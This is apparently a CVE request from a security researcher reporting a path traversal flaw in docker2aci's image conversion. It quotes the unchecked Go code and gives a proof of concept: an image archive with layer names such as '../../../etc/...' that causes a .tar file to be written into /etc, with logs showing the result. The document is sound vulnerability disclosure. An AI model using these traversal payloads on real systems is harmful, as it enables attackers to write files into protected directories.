CVE Request: docker2aci: Path traversals present in image converting

[张开翔 <zhangkaixiang () 360 cn>]

DESCRIPTION



This is Kaixiang Zhang of the Cloud Security Team, Qihoo 360. I submitted an path traversal vulnerability to docker2aci 
<https://github.com/appc/docker2aci/issues/201> recently. The issue exists in image converting, there must be a 
possibility that it extracts embedded layer data to arbitrary directories or paths since no essential check for the 
output file path. Could you please assign a CVE number for it? Thanks.



Source info



tmpLayerPath := path.Join(tmpDir, layerIDs[i])

         tmpLayerPath += ".tar"

         layerFile, err := extractEmbeddedLayer(lb.file, layerIDs[i], tmpLayerPath)// without essential check for 
layerpath, may breakout tmpDir.



Proof-of-concept



Build or downloading a malicious image as an archive file, containing some layer files with relative names ,like 
“../../../etc/ filename”, as well modifying the content of some corresponding json file related to it. then running 
docker2aci to convert the docker’s image to aci. Overview of the content of malicious image:

../../../etc

../../../etc/0ca87058da90257128ca83a1d0e1bd55236f43c75b915120c70498af6ad37625

../../../etc/0ca87058da90257128ca83a1d0e1bd55236f43c75b915120c70498af6ad37625/json

../../../etc/0ca87058da90257128ca83a1d0e1bd55236f43c75b915120c70498af6ad37625/VERSION

../../../etc/0ca87058da90257128ca83a1d0e1bd55236f43c75b915120c70498af6ad37625/layer.tar


and logs:
         tmpDir:  /tmp/docker2aci-878549369
tmpLayerPath:  /etc/0ca87058da90257128ca83a1d0e1bd55236f43c75b915120c70498af6ad37625.tar
Extracting ../../../etc

then check the results:  ls /etc/*.tar
/etc/0ca87058da90257128ca83a1d0e1bd55236f43c75b915120c70498af6ad37625.tar

Of course, the tar file content could be modified by yourself.

Best regards&